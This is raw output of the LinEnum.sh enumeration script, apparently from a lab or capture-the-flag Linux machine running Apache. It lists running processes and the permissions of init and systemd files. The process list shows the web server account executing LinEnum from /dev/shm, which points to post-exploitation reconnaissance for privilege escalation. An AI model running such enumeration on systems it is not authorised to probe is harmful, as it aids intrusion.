root 255 0.0 0.0 0 0 ? S 10:15 0:00 [kauditd]
root 275 0.0 0.2 93088 2356 ? Ssl 10:15 0:00 vmware-vmblock-fuse /run/vmblock-fuse -o rw,subtype=vmware-vmblock,default_permissions,allow_other,dev,suid
root 298 0.0 0.3 44416 3864 ? Ss 10:15 0:00 /lib/systemd/systemd-udevd
systemd+ 422 0.0 0.2 100324 2536 ? Ssl 10:15 0:00 /lib/systemd/systemd-timesyncd
message+ 556 0.0 0.3 42900 3968 ? Ss 10:15 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 569 0.0 0.2 29008 2964 ? Ss 10:15 0:00 /usr/sbin/cron -f
root 570 0.0 0.1 20100 1128 ? Ss 10:15 0:00 /lib/systemd/systemd-logind
root 573 0.0 0.6 275760 6232 ? Ssl 10:15 0:00 /usr/lib/accountsservice/accounts-daemon
syslog 574 0.0 0.3 256396 3360 ? Ssl 10:15 0:00 /usr/sbin/rsyslogd -n
root 591 0.0 0.9 111868 9648 ? Ss 10:15 0:04 /usr/bin/vmtoolsd
root 643 0.0 0.0 0 0 ? S< 10:15 0:00 [edac-poller]
root 664 0.0 0.1 15940 1776 tty1 Ss+ 10:15 0:00 /sbin/agetty --noclear tty1 linux
root 771 0.0 2.4 255896 24876 ? Ss 10:15 0:00 /usr/sbin/apache2 -k start
www-data 775 0.0 1.0 256220 10944 ? S 10:15 0:01 /usr/sbin/apache2 -k start
www-data 776 0.0 1.0 256236 10676 ? S 10:15 0:01 /usr/sbin/apache2 -k start
www-data 777 0.0 1.2 256380 12512 ? S 10:15 0:01 /usr/sbin/apache2 -k start
www-data 778 0.0 1.2 256380 12036 ? S 10:15 0:01 /usr/sbin/apache2 -k start
www-data 813 0.0 1.1 256212 11836 ? S 10:23 0:01 /usr/sbin/apache2 -k start
www-data 816 0.0 0.7 255976 7780 ? S 10:23 0:01 /usr/sbin/apache2 -k start
www-data 817 0.0 0.9 256148 9080 ? S 10:23 0:01 /usr/sbin/apache2 -k start
www-data 819 0.0 1.1 256204 11684 ? S 10:23 0:01 /usr/sbin/apache2 -k start
root 844 0.0 0.0 0 0 ? S 10:30 0:02 [kworker/0:0]
www-data 1085 0.1 1.1 256372 11904 ? S 11:21 0:01 /usr/sbin/apache2 -k start
www-data 1089 0.1 0.7 255976 7780 ? S 11:21 0:01 /usr/sbin/apache2 -k start
www-data 1211 0.0 0.0 4508 704 ? S 11:39 0:00 sh -c cd /dev/shm; bash LinEnum.sh 2>&1
www-data 1212 0.0 0.3 19028 3848 ? S 11:39 0:00 bash LinEnum.sh
www-data 1213 0.0 0.3 19072 3620 ? S 11:39 0:00 bash LinEnum.sh
www-data 1214 0.0 0.0 4384 688 ? S 11:39 0:00 tee -a
www-data 1421 0.0 0.3 19056 3012 ? S 11:39 0:00 bash LinEnum.sh
www-data 1422 0.0 0.2 34424 2788 ? R 11:39 0:00 ps aux


[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root 326224 Jan 18 2017 /lib/systemd/systemd-journald
-rwxr-xr-x 1 root root 618520 Jan 18 2017 /lib/systemd/systemd-logind
-rwxr-xr-x 1 root root 141904 Jan 18 2017 /lib/systemd/systemd-timesyncd
-rwxr-xr-x 1 root root 453240 Jan 18 2017 /lib/systemd/systemd-udevd
-rwxr-xr-x 1 root root 44104 Dec 16 2016 /sbin/agetty
lrwxrwxrwx 1 root root 20 Dec 4 2017 /sbin/init -> /lib/systemd/systemd
-rwxr-xr-x 1 root root 224208 Jan 12 2017 /usr/bin/dbus-daemon
-rwxr-xr-x 1 root root 44528 Feb 9 2017 /usr/bin/vmtoolsd
-rwxr-xr-x 1 root root 164928 Nov 3 2016 /usr/lib/accountsservice/accounts-daemon
-rwxr-xr-x 1 root root 662496 Sep 18 2017 /usr/sbin/apache2
-rwxr-xr-x 1 root root 44472 Apr 5 2016 /usr/sbin/cron
-rwxr-xr-x 1 root root 599328 Apr 5 2016 /usr/sbin/rsyslogd


[-] /etc/init.d/ binary permissions:
total 252
drwxr-xr-x 2 root root 4096 Dec 4 2017 .
drwxr-xr-x 89 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 root root 1355 Dec 4 2017 .depend.boot
-rw-r--r-- 1 root root 471 Dec 4 2017 .depend.start
-rw-r--r-- 1 root root 667 Dec 4 2017 .depend.stop
-rw-r--r-- 1 root root 2427 Jan 19 2016 README
-rwxr-xr-x 1 root root 2210 Apr 5 2016 apache-htcacheclean
-rwxr-xr-x 1 root root 8087 Apr 5 2016 apache2
-rwxr-xr-x 1 root root 6250 Oct 4 2016 apparmor
-rwxr-xr-x 1 root root 1275 Jan 19 2016 bootmisc.sh
-rwxr-xr-x 1 root root 3807 Jan 19 2016 checkfs.sh
-rwxr-xr-x 1 root root 1098 Jan 19 2016 checkroot-bootclean.sh
-rwxr-xr-x 1 root root 9353 Jan 19 2016 checkroot.sh
-rwxr-xr-x 1 root root 1343 Apr 4 2016 console-setup
-rwxr-xr-x 1 root root 3049 Apr 5 2016 cron
-rwxr-xr-x 1 root root 2813 Dec 1 2015 dbus
-rwxr-xr-x 1 root root 1105 Mar 15 2016 grub-common
-rwxr-xr-x 1 root root 1336 Jan 19 2016 halt
-rwxr-xr-x 1 root root 1423 Jan 19 2016 hostname.sh
-rwxr-xr-x 1 root root 3809 Mar 12 2016 hwclock.sh
-rwxr-xr-x 1 root root 2372 Apr 11 2016 irqbalance
-rwxr-xr-x 1 root root 1804 Apr 4 2016 keyboard-setup
-rwxr-xr-x 1 root root 1300 Jan 19 2016 killprocs
-rwxr-xr-x 1 root root 2087 Dec 20 2015 kmod
-rwxr-xr-x 1 root root 703 Jan 19 2016 mountall-bootclean.sh
-rwxr-xr-x 1 root root 2301 Jan 19 2016 mountall.sh
-rwxr-xr-x 1 root root 1461 Jan 19 2016 mountdevsubfs.sh
-rwxr-xr-x 1 root root 1564 Jan 19 2016 mountkernfs.sh
-rwxr-xr-x 1 root root 711 Jan 19 2016 mountnfs-bootclean.sh
-rwxr-xr-x 1 root root 2456 Jan 19 2016 mountnfs.sh
-rwxr-xr-x 1 root root 4771 Jul 19 2015 networking
-rwxr-xr-x 1 root root 1581 Oct 15 2015 ondemand
-rwxr-xr-x 1 root root 1578 Sep 17 2016 open-vm-tools
-rwxr-xr-x 1 root root 1366 Nov 15 2015 plymouth
-rwxr-xr-x 1 root root 752 Nov 15 2015 plymouth-log
-rwxr-xr-x 1 root root 1192 Sep 5 2015 procps
-rwxr-xr-x 1 root root 6366 Jan 19 2016 rc
-rwxr-xr-x 1 root root 820 Jan 19 2016 rc.local
-rwxr-xr-x 1 root root 117 Jan 19 2016 rcS
-rwxr-xr-x 1 root root 661 Jan 19 2016 reboot
-rwxr-xr-x 1 root root 4149 Nov 23 2015 resolvconf
-rwxr-xr-x 1 root root 4355 Jul 10 2014 rsync
-rwxr-xr-x 1 root root 2796 Feb 3 2016 rsyslog
-rwxr-xr-x 1 root root 3927 Jan 19 2016 sendsigs
-rwxr-xr-x 1 root root 597 Jan 19 2016 single
-rw-r--r-- 1 root root 1087 Jan 19 2016 skeleton
-rwxr-xr-x 1 root root 6087 Apr 12 2016 udev
-rwxr-xr-x 1 root root 2049 Aug 7 2014 ufw
-rwxr-xr-x 1 root root 2737 Jan 19 2016 umountfs
-rwxr-xr-x 1 root root 2202 Jan 19 2016 umountnfs.sh
-rwxr-xr-x 1 root root 1879 Jan 19 2016 umountroot
-rwxr-xr-x 1 root root 3111 Jan 19 2016 urandom
-rwxr-xr-x 1 root root 1306 Dec 16 2016 uuidd
-rwxr-xr-x 1 root root 2757 Nov 10 2015 x11-common


[-] /etc/init/ config file permissions:
total 124
drwxr-xr-x 2 root root 4096 Dec 4 2017 .
drwxr-xr-x 89 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 root root 3735 Oct 4 2016 apparmor.conf
-rw-r--r-- 1 root root 250 Apr 4 2016 console-font.conf
-rw-r--r-- 1 root root 509 Apr 4 2016 console-setup.conf
-rw-r--r-- 1 root root 297 Apr 5 2016 cron.conf
-rw-r--r-- 1 root root 482 Sep 1 2015 dbus.conf
-rw-r--r-- 1 root root 1247 Jun 1 2015 friendly-recovery.conf
-rw-r--r-- 1 root root 284 Jul 23 2013 hostname.conf
-rw-r--r-- 1 root root 300 May 21 2014 hostname.sh.conf
-rw-r--r-- 1 root root 561 Mar 14 2016 hwclock-save.conf
-rw-r--r-- 1 root root 674 Mar 14 2016 hwclock.conf
-rw-r--r-- 1 root root 109 Mar 14 2016 hwclock.sh.conf
-rw-r--r-- 1 root root 597 Apr 11 2016 irqbalance.conf
-rw-r--r-- 1 root root 689 Aug 20 2015 kmod.conf
-rw-r--r-- 1 root root 530 Jun 2 2015 network-interface-container.conf
-rw-r--r-- 1 root root 1756 Jun 2 2015 network-interface-security.conf
-rw-r--r-- 1 root root 933 Jun 2 2015 network-interface.conf
-rw-r--r-- 1 root root 2493 Jun 2 2015 networking.conf
-rw-r--r-- 1 root root 568 Feb 1 2016 passwd.conf
-rw-r--r-- 1 root root 363 Jun 5 2014 procps-instance.conf
-rw-r--r-- 1 root root 119 Jun 5 2014 procps.conf
-rw-r--r-- 1 root root 457 Jun 3 2015 resolvconf.conf
-rw-r--r-- 1 root root 426 Dec 2 2015 rsyslog.conf
-rw-r--r-- 1 root root 230 Apr 4 2016 setvtrgb.conf
-rw-r--r-- 1 root root 337 Apr 12 2016 udev.conf
-rw-r--r-- 1 root root 360 Apr 12 2016 udevmonitor.conf
-rw-r--r-- 1 root root 352 Apr 12 2016 udevtrigger.conf
-rw-r--r-- 1 root root 473 Aug 7 2014 ufw.conf
-rw-r--r-- 1 root root 683 Feb 24 2015 ureadahead-other.conf
-rw-r--r-- 1 root root 889 Feb 24 2015 ureadahead.conf


[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 8.2M
drwxr-xr-x 26 root root 12K Dec 4 2017 system
drwxr-xr-x 2 root root 4.0K Dec 4 2017 system-sleep
drwxr-xr-x 2 root root 4.0K Dec 4 2017 system-preset
drwxr-xr-x 2 root root 4.0K Dec 4 2017 system-generators
drwxr-xr-x 2 root root 4.0K Dec 4 2017 network
-rwxr-xr-x 1 root root 443K Jan 18 2017 systemd-udevd
-rwxr-xr-x 1 root root 15K Jan 18 2017 systemd-ac-power
-rwxr-xr-x 1 root root 47K Jan 18 2017 systemd-binfmt
-rwxr-xr-x 1 root root 103K Jan 18 2017 systemd-bootchart
-rwxr-xr-x 1 root root 91K Jan 18 2017 systemd-cryptsetup
-rwxr-xr-x 1 root root 75K Jan 18 2017 systemd-fsckd
-rwxr-xr-x 1 root root 276K Jan 18 2017 systemd-initctl
-rwxr-xr-x 1 root root 824K Jan 18 2017 systemd-networkd
-rwxr-xr-x 1 root root 35K Jan 18 2017 systemd-quotacheck
-rwxr-xr-x 1 root root 657K Jan 18 2017 systemd-resolved
-rwxr-xr-x 1 root root 35K Jan 18 2017 systemd-user-sessions
-rwxr-xr-x 1 root root 55K Jan 18 2017 systemd-activate
-rwxr-xr-x 1 root root 91K Jan 18 2017 systemd-backlight
-rwxr-xr-x 1 root root 352K Jan 18 2017 systemd-bus-proxyd
-rwxr-xr-x 1 root root 31K Jan 18 2017 systemd-hibernate-resume
-rwxr-xr-x 1 root root 340K Jan 18 2017 systemd-localed
-rwxr-xr-x 1 root root 605K Jan 18 2017 systemd-logind
-rwxr-xr-x 1 root root 123K Jan 18 2017 systemd-networkd-wait-online
-rwxr-xr-x 1 root root 35K Jan 18 2017 systemd-random-seed
-rwxr-xr-x 1 root root 31K Jan 18 2017 systemd-reply-password
-rwxr-xr-x 1 root root 91K Jan 18 2017 systemd-rfkill
-rwxr-xr-x 1 root root 143K Jan 18 2017 systemd-shutdown
-rwxr-xr-x 1 root root 71K Jan 18 2017 systemd-sleep
-rwxr-xr-x 1 root root 51K Jan 18 2017 systemd-sysctl
-rwxr-xr-x 1 root root 333K Jan 18 2017 systemd-timedated
-rwxr-xr-x 1 root root 139K Jan 18 2017 systemd-timesyncd
-rwxr-xr-x 1 root root 276K Jan 18 2017 systemd-update-utmp
-rwxr-xr-x 1 root root 1.6M Jan 18 2017 systemd
-rwxr-xr-x 1 root root 268K Jan 18 2017 systemd-cgroups-agent
-rwxr-xr-x 1 root root 301K Jan 18 2017 systemd-fsck
-rwxr-xr-x 1 root root 332K Jan 18 2017 systemd-hostnamed
-rwxr-xr-x 1 root root 319K Jan 18 2017 systemd-journald
-rwxr-xr-x 1 root root 51K Jan 18 2017 systemd-modules-load
-rwxr-xr-x 1 root root 51K Jan 18 2017 systemd-remount-fs
-rwxr-xr-x 1 root root 91K Jan 18 2017 systemd-socket-proxyd
-rwxr-xr-x 1 root root 1.3K Jan 12 2017 systemd-sysv-install
drwxr-xr-x 2 root root 4.0K Apr 12 2016 system-shutdown

/lib/systemd/system:
total 792K
drwxr-xr-x 2 root root 4.0K Dec 4 2017 apache2.service.d
drwxr-xr-x 2 root root 4.0K Dec 4 2017 halt.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 initrd-switch-root.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 timers.target.wants
lrwxrwxrwx 1 root root 21 Dec 4 2017 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root 9 Dec 4 2017 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root 27 Dec 4 2017 urandom.service -> systemd-random-seed.service
lrwxrwxrwx 1 root root 9 Dec 4 2017 x11-common.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Dec 4 2017 systemd-timesyncd.service.d
lrwxrwxrwx 1 root root 9 Dec 4 2017 sendsigs.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Dec 4 2017 sigpwr.target.wants
lrwxrwxrwx 1 root root 9 Dec 4 2017 single.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 stop-bootlogd-single.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 stop-bootlogd.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Dec 4 2017 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Dec 4 2017 resolvconf.service.wants
lrwxrwxrwx 1 root root 9 Dec 4 2017 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root 15 Dec 4 2017 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root 13 Dec 4 2017 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root 17 Dec 4 2017 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root 17 Dec 4 2017 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root 17 Dec 4 2017 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root 16 Dec 4 2017 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root 13 Dec 4 2017 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root 22 Dec 4 2017 procps.service -> systemd-sysctl.service
drwxr-xr-x 2 root root 4.0K Dec 4 2017 rc-local.service.d
lrwxrwxrwx 1 root root 16 Dec 4 2017 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root 9 Dec 4 2017 rc.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 rcS.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 reboot.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Dec 4 2017 graphical.target.wants
lrwxrwxrwx 1 root root 9 Dec 4 2017 halt.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 hostname.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 hwclock.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 killprocs.service -> /dev/null
lrwxrwxrwx 1 root root 28 Dec 4 2017 kmod.service -> systemd-modules-load.service
drwxr-xr-x 2 root root 4.0K Dec 4 2017 local-fs.target.wants
lrwxrwxrwx 1 root root 28 Dec 4 2017 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root 9 Dec 4 2017 motd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 mountall.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 mountnfs.service -> /dev/null
lrwxrwxrwx 1 root root 16 Dec 4 2017 default.target -> graphical.target
lrwxrwxrwx 1 root root 9 Dec 4 2017 fuse.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Dec 4 2017 getty.target.wants
lrwxrwxrwx 1 root root 14 Dec 4 2017 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root 9 Dec 4 2017 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 checkroot.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 4 2017 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root 13 Dec 4 2017 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root 25 Dec 4 2017 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root 23 Dec 4 2017 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root 22 Dec 4 2017 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root 24 Dec 4 2017 dbus-org.freedesktop.network1.service -> systemd-networkd.service
lrwxrwxrwx 1 root root 24 Dec 4 2017 dbus-org.freedesktop.resolve1.service -> systemd-resolved.service
lrwxrwxrwx 1 root root 25 Dec 4 2017 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
drwxr-xr-x 2 root root 4.0K Feb 15 2017 busnames.target.wants
-rw-r--r-- 1 root root 460 Feb 9 2017 run-vmblock-fuse.mount
-rw-r--r-- 1 root root 269 Jan 31 2017 setvtrgb.service
-rw-r--r-- 1 root root 770 Jan 18 2017 console-getty.service
-rw-r--r-- 1 root root 742 Jan 18 2017 console-shell.service
-rw-r--r-- 1 root root 791 Jan 18 2017 container-getty@.service
-rw-r--r-- 1 root root 1010 Jan 18 2017 debug-shell.service
-rw-r--r-- 1 root root 1009 Jan 18 2017 emergency.service
-rw-r--r-- 1 root root 1.5K Jan 18 2017 getty@.service
-rw-r--r-- 1 root root 630 Jan 18 2017 initrd-cleanup.service
-rw-r--r-- 1 root root 790 Jan 18 2017 initrd-parse-etc.service
-rw-r--r-- 1 root root 640 Jan 18 2017 initrd-switch-root.service
-rw-r--r-- 1 root root 664 Jan 18 2017 initrd-udevadm-cleanup-db.service
-rw-r--r-- 1 root root 677 Jan 18 2017 kmod-static-nodes.service
-rw-r--r-- 1 root root 473 Jan 18 2017 mail-transport-agent.target
-rw-r--r-- 1 root root 568 Jan 18 2017 quotaon.service
-rw-r--r-- 1 root root 612 Jan 18 2017 rc-local.service
-rw-r--r-- 1 root root 978 Jan 18 2017 rescue.service
-rw-r--r-- 1 root root 1.1K Jan 18 2017 serial-getty@.service
-rw-r--r-- 1 root root 653 Jan 18 2017 systemd-ask-password-console.service
-rw-r--r-- 1 root root 681 Jan 18 2017 systemd-ask-password-wall.service
-rw-r--r-- 1 root root 724 Jan 18 2017 systemd-backlight@.service
-rw-r--r-- 1 root root 959 Jan 18 2017 systemd-binfmt.service
-rw-r--r-- 1 root root 650 Jan 18 2017 systemd-bootchart.service
-rw-r--r-- 1 root root 1.0K Jan 18 2017 systemd-bus-proxyd.service
-rw-r--r-- 1 root root 497 Jan 18 2017 systemd-exit.service
-rw-r--r-- 1 root root 674 Jan 18 2017 systemd-fsck-root.service
-rw-r--r-- 1 root root 648 Jan 18 2017 systemd-fsck@.service
-rw-r--r-- 1 root root 551 Jan 18 2017 systemd-fsckd.service
-rw-r--r-- 1 root root 544 Jan 18 2017 systemd-halt.service
-rw-r--r-- 1 root root 631 Jan 18 2017 systemd-hibernate-resume@.service
-rw-r--r-- 1 root root 501 Jan 18 2017 systemd-hibernate.service
-rw-r--r-- 1 root root 710 Jan 18 2017 systemd-hostnamed.service
-rw-r--r-- 1 root root 778 Jan 18 2017 systemd-hwdb-update.service
-rw-r--r-- 1 root root 519 Jan 18 2017 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root 480 Jan 18 2017 systemd-initctl.service
-rw-r--r-- 1 root root 731 Jan 18 2017 systemd-journal-flush.service
-rw-r--r-- 1 root root 1.3K Jan 18 2017 systemd-journald.service
-rw-r--r-- 1 root root 557 Jan 18 2017 systemd-kexec.service
-rw-r--r-- 1 root root 691 Jan 18 2017 systemd-localed.service
-rw-r--r-- 1 root root 1.2K Jan 18 2017 systemd-logind.service
-rw-r--r-- 1 root root 693 Jan 18 2017 systemd-machine-id-commit.service
-rw-r--r-- 1 root root 967 Jan 18 2017 systemd-modules-load.service
-rw-r--r-- 1 root root 685 Jan 18 2017 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root 1.3K Jan 18 2017 systemd-networkd.service
-rw-r--r-- 1 root root 553 Jan 18 2017 systemd-poweroff.service
-rw-r--r-- 1 root root 614 Jan 18 2017 systemd-quotacheck.service
-rw-r--r-- 1 root root 717 Jan 18 2017 systemd-random-seed.service
-rw-r--r-- 1 root root 548 Jan 18 2017 systemd-reboot.service
-rw-r--r-- 1 root root 757 Jan 18 2017 systemd-remount-fs.service
-rw-r--r-- 1 root root 907 Jan 18 2017 systemd-resolved.service
-rw-r--r-- 1 root root 696 Jan 18 2017 systemd-rfkill.service
-rw-r--r-- 1 root root 497 Jan 18 2017 systemd-suspend.service
-rw-r--r-- 1 root root 649 Jan 18 2017 systemd-sysctl.service
-rw-r--r-- 1 root root 655 Jan 18 2017 systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Jan 18 2017 systemd-timesyncd.service
-rw-r--r-- 1 root root 598 Jan 18 2017 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root 703 Jan 18 2017 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root 683 Jan 18 2017 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root 823 Jan 18 2017 systemd-udev-settle.service
-rw-r--r-- 1 root root 743 Jan 18 2017 systemd-udev-trigger.service
-rw-r--r-- 1 root root 825 Jan 18 2017 systemd-udevd.service
-rw-r--r-- 1 root root 757 Jan 18 2017 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root 754 Jan 18 2017 systemd-update-utmp.service
-rw-r--r-- 1 root root 573 Jan 18 2017 systemd-user-sessions.service
-rw-r--r-- 1 root root 528 Jan 18 2017 user@.service
-rw-r--r-- 1 root root 403 Jan 18 2017 -.slice
-rw-r--r-- 1 root root 879 Jan 18 2017 basic.target
-rw-r--r-- 1 root root 379 Jan 18 2017 bluetooth.target
-rw-r--r-- 1 root root 358 Jan 18 2017 busnames.target
-rw-r--r-- 1 root root 394 Jan 18 2017 cryptsetup-pre.target
-rw-r--r-- 1 root root 366 Jan 18 2017 cryptsetup.target
-rw-r--r-- 1 root root 670 Jan 18 2017 dev-hugepages.mount
-rw-r--r-- 1 root root 624 Jan 18 2017 dev-mqueue.mount
-rw-r--r-- 1 root root 431 Jan 18 2017 emergency.target
-rw-r--r-- 1 root root 501 Jan 18 2017 exit.target
-rw-r--r-- 1 root root 440 Jan 18 2017 final.target
-rw-r--r-- 1 root root 460 Jan 18 2017 getty.target
-rw-r--r-- 1 root root 558 Jan 18 2017 graphical.target
-rw-r--r-- 1 root root 487 Jan 18 2017 halt.target
-rw-r--r-- 1 root root 447 Jan 18 2017 hibernate.target
-rw-r--r-- 1 root root 468 Jan 18 2017 hybrid-sleep.target
-rw-r--r-- 1 root root 553 Jan 18 2017 initrd-fs.target
-rw-r--r-- 1 root root 526 Jan 18 2017 initrd-root-fs.target
-rw-r--r-- 1 root root 691 Jan 18 2017 initrd-switch-root.target
-rw-r--r-- 1 root root 671 Jan 18 2017 initrd.target
-rw-r--r-- 1 root root 501 Jan 18 2017 kexec.target
-rw-r--r-- 1 root root 395 Jan 18 2017 local-fs-pre.target
-rw-r--r-- 1 root root 507 Jan 18 2017 local-fs.target
-rw-r--r-- 1 root root 405 Jan 18 2017 machine.slice
-rw-r--r-- 1 root root 492 Jan 18 2017 multi-user.target
-rw-r--r-- 1 root root 464 Jan 18 2017 network-online.target
-rw-r--r-- 1 root root 461 Jan 18 2017 network-pre.target
-rw-r--r-- 1 root root 480 Jan 18 2017 network.target
-rw-r--r-- 1 root root 514 Jan 18 2017 nss-lookup.target
-rw-r--r-- 1 root root 473 Jan 18 2017 nss-user-lookup.target
-rw-r--r-- 1 root root 354 Jan 18 2017 paths.target
-rw-r--r-- 1 root root 552 Jan 18 2017 poweroff.target
-rw-r--r-- 1 root root 377 Jan 18 2017 printer.target
-rw-r--r-- 1 root root 693 Jan 18 2017 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root 603 Jan 18 2017 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root 543 Jan 18 2017 reboot.target
-rw-r--r-- 1 root root 396 Jan 18 2017 remote-fs-pre.target
-rw-r--r-- 1 root root 482 Jan 18 2017 remote-fs.target
-rw-r--r-- 1 root root 486 Jan 18 2017 rescue.target
-rw-r--r-- 1 root root 500 Jan 18 2017 rpcbind.target
-rw-r--r-- 1 root root 402 Jan 18 2017 shutdown.target
-rw-r--r-- 1 root root 362 Jan 18 2017 sigpwr.target
-rw-r--r-- 1 root root 420 Jan 18 2017 sleep.target
-rw-r--r-- 1 root root 409 Jan 18 2017 slices.target
-rw-r--r-- 1 root root 380 Jan 18 2017 smartcard.target
-rw-r--r-- 1 root root 356 Jan 18 2017 sockets.target
-rw-r--r-- 1 root root 380 Jan 18 2017 sound.target
-rw-r--r-- 1 root root 441 Jan 18 2017 suspend.target
-rw-r--r-- 1 root root 353 Jan 18 2017 swap.target
-rw-r--r-- 1 root root 715 Jan 18 2017 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root 719 Jan 18 2017 sys-kernel-config.mount
-rw-r--r-- 1 root root 662 Jan 18 2017 sys-kernel-debug.mount
-rw-r--r-- 1 root root 518 Jan 18 2017 sysinit.target
-rw-r--r-- 1 root root 1.3K Jan 18 2017 syslog.socket
-rw-r--r-- 1 root root 585 Jan 18 2017 system-update.target
-rw-r--r-- 1 root root 436 Jan 18 2017 system.slice
-rw-r--r-- 1 root root 646 Jan 18 2017 systemd-ask-password-console.path
-rw-r--r-- 1 root root 574 Jan 18 2017 systemd-ask-password-wall.path
-rw-r--r-- 1 root root 409 Jan 18 2017 systemd-bus-proxyd.socket
-rw-r--r-- 1 root root 540 Jan 18 2017 systemd-fsckd.socket
-rw-r--r-- 1 root root 524 Jan 18 2017 systemd-initctl.socket
-rw-r--r-- 1 root root 607 Jan 18 2017 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.1K Jan 18 2017 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root 842 Jan 18 2017 systemd-journald.socket
-rw-r--r-- 1 root root 591 Jan 18 2017 systemd-networkd.socket
-rw-r--r-- 1 root root 617 Jan 18 2017 systemd-rfkill.socket
-rw-r--r-- 1 root root 450 Jan 18 2017 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root 578 Jan 18 2017 systemd-udevd-control.socket
-rw-r--r-- 1 root root 570 Jan 18 2017 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root 395 Jan 18 2017 time-sync.target
-rw-r--r-- 1 root root 405 Jan 18 2017 timers.target
-rw-r--r-- 1 root root 417 Jan 18 2017 umount.target
-rw-r--r-- 1 root root 392 Jan 18 2017 user.slice
-rw-r--r-- 1 root root 663 Jan 18 2017 systemd-networkd-resolvconf-update.service
-rw-r--r-- 1 root root 153 Jan 17 2017 apt-daily.service
-rw-r--r-- 1 root root 162 Jan 17 2017 apt-daily.timer
-rw-r--r-- 1 root root 342 Jan 13 2017 getty-static.service
-rw-r--r-- 1 root root 153 Jan 13 2017 sigpwr-container-shutdown.service
-rw-r--r-- 1 root root 152 Jan 13 2017 systemd-networkd-resolvconf-update.path
-rw-r--r-- 1 root root 491 Jan 12 2017 dbus.service
-rw-r--r-- 1 root root 106 Jan 12 2017 dbus.socket
-rw-r--r-- 1 root root 189 Dec 16 2016 uuidd.service
-rw-r--r-- 1 root root 126 Dec 16 2016 uuidd.socket
-rw-r--r-- 1 root root 735 Nov 30 2016 networking.service
-rw-r--r-- 1 root root 497 Nov 30 2016 ifup@.service
